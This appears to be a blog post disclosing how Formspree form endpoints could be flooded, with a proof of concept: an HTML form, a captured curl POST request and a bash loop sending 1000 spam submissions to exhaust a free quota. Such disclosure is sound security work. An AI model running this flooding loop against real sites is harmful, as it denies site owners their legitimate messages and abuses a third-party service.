Posted on

Update: reCAPTCHA is now integrated right into Formspree.

Formspree is a project that solves a problem many of us have faced: easily adding forms to otherwise static HTML pages.

Disclaimer: This post is for education purposes, and the discussed method should not be used to abuse any production websites using Formspree.

A user would send a POST request (through forms) over to Formspree. Subsequently, Formspree would forward the request through email to the owner of the website effectively allowing the user to contact the site owner. However, it is through this two-step system that the service is flawed.


  1. Spam filter

Webpage → Formspree → Email

With the above setup, it is clear that email filters are impossible. On Formspree’s end, they would process any incoming request as a regular request and forward it to the site owner. On the receiving end, the submissions will be sent from Formspree ([email protected]) which has to be whitelisted to receive legitimate forms.

  1. Limited submissions (free) & Unlimited submissions (paid)

1000 submissions/months for the free version. A small-medium enterprise may use the free version to minimise cost. We could simply send 1000 submissions to use up their quota and as a result, prevent them from receiving legitimate emails.

Now imagine a business using the paid version. The unlimited submissions coupled with the randomising of values make it almost impossible to filter the legitimate emails from the pool of spam email.

Proof of Concept

Form creation

<form action="[email protected]" method="POST">
    <input name="name" type="text" />
    <input name="_replyto" type="text" />
    <input name="_subject" type="text" />
    <input type="submit" value="Send" />

Setting up Formspree

Now let’s test to see if the setup was successful

Resend the form and intercept using BurpSuite. Then copy the request as curl command.

curl -i -s -k -X 'POST' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0' -H 'Referer:' -H 'Content-Type: application/x-www-form-urlencoded' --data-binary $'name=spam1000&_replyto=spam1000&_subject=spam1000' '[email protected]'

We could now send 1000 request using the following command.

for n in {1..1000}; do curl -i -s -k -X 'POST' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0' -H 'Referer:' -H 'Content-Type: application/x-www-form-urlencoded' --data-binary $'name=spam1000&_replyto=spam1000&_subject=spam1000' '[email protected]'; done

Final thoughts

Unless Formspree decides to implement an internal email spam filter, this would be a problem for users of Formspree.

Categories: All